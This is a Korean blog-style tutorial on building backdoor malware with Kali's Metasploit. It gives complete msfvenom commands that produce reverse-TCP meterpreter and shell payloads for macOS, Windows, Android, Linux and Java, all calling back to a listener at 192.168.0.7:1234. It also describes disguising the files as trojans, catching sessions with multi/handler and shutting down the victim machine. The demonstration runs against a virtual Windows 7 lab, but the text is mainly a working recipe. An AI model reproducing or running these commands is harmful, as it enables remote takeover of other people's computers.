Kali/ 백도어 악성코드 만들기 (5가지 OS)

악성코드를 만들려면 어떤 운영체제의 악성코드를 만들어야 되는지 알아야한다.

윈도우,자바,안드로이드,리눅스,애플

 

백도어 -  시스템 접근에 대한 사용자 인증 등 정상적인 절차를 거치지 않고 응용프로그램 또는 시스템에 접근할 수 있도록 하는 프로그램이다

 

터미널

1. 내부 아이피 확인

2. msfvenom -l

- 모듈 유형을 나열

- payload, encorder, nop 등의 모듈 정보 확인

 

msfvenom - 메타스플로잇 독립 페이로드 생성기

 

메타스플로잇?- 오픈소스 도구, 공격 코드 보안 테스팅 등을 제공하는 일종의 체계

 

특징

- 공개된 공격 코드 정리/검증으로 시간 단축

- 여러 플랫폼에서 사용가능

- 취약점 빠르게 최신화

- 취약점에 대한 쉘코드 제공

 

메타스플로잇 용어

1. Exploit

- 공격자 또는 모의해킹 테스터가 서비스 내의 결함을 찾는데에 유익한 수단

- 일반적인 exploit은 버퍼 오버플로우, 웹 어플리케이션 취약점(SQL-Injection) 설정 에러등을 모두 포함.

 

버퍼 오버플로우??- 메모리를 다루는 데에 오류가 발생하여 잘못된 동작을 하는 프로그램 취약점이다 

 

2. Payload

- 시스템 상에서 실행 되길 원하는 코드 , 프레임 워크에 의해 선택되고 처리되는 코드

-  웜, 바이러스, 트로이목마 같은 해로운 소프트웨어를 분석할 때 페이로드는 그 소프트웨어가 주는 피해를 뜻한다.

 

프레임 워크 -  정보시스템을 개발할 때 활용되는 개발 · 실행 · 테스트 · 운영 환경을 지원하는 소프트웨어이다

 

장점: 하나의 단일 도구 , 표준화된 명령줄 옵션, 속도 향상

 

 msfvenom -l

 

 

 

meterpreter???

-이명령어를 사용하여 타겟에 파일업로드, 관리자 패스워드, 백도어생성, 키로그, VNC Insert 많은일을 할수 있다.

 

osx/x86/shell_reverse_tcp

- 애플 pc 악성코드용

 

windows/meterpreter/reverse_tcp

 

android/meterpreter/reverse_tcp

 

linux/x86/meterpreter/reverse_tcp

 

java/meterpreter/reverse_tcp

-자바 관련 파일 악성코드용

 

msfvenom -p osx/x86/shell_reverse_tcp lhost=192.168.0.7 lport=1234 -f macho > /root/바탕화면/apple.macho

 

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.7 lport=1234 -f exe > /root/바탕화면/windows.exe

 

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.7 lport=1234 R > /root/바탕화면/android.apk

 

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.7 lport=1234 -f elf > /root/바탕화면/linux.elf

 

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.0.7 lport=1234 R > /root/바탕화면/java.jar

 

-p = payload

-f = 확장자

 

 

5개 악성파일이 만들어 진것을 볼수 있다.

저파일을 프로그램과 연결시켜주면 트로이목마가 되는것이다.

 

가상 윈도우7에 내가만든 윈도우OS를 보낸다 .

 

터미널창

msfconsole 실행

- 메타스폴로잇 실행

 

use exploit/multi/handler

 

 

set exitonsession false  -> 세션 백그라운드 설정

 

exploit -j  -> 서버를 시작  리스너

 

 

가상윈도우 에서 악성코드 실행하면 칼리에서 세션이 뜨는거 확인.

 

 

명령어 sessions 을 입력하면 어디에서 열렸는지 정보가 나온다.

 

sessions -i 1 을 입력하면 윈도우와 연결이 된다.

 

meterpreter이 나오게 되고 셧다운을 실행하면 그 상대 pc는 종료하게 된다.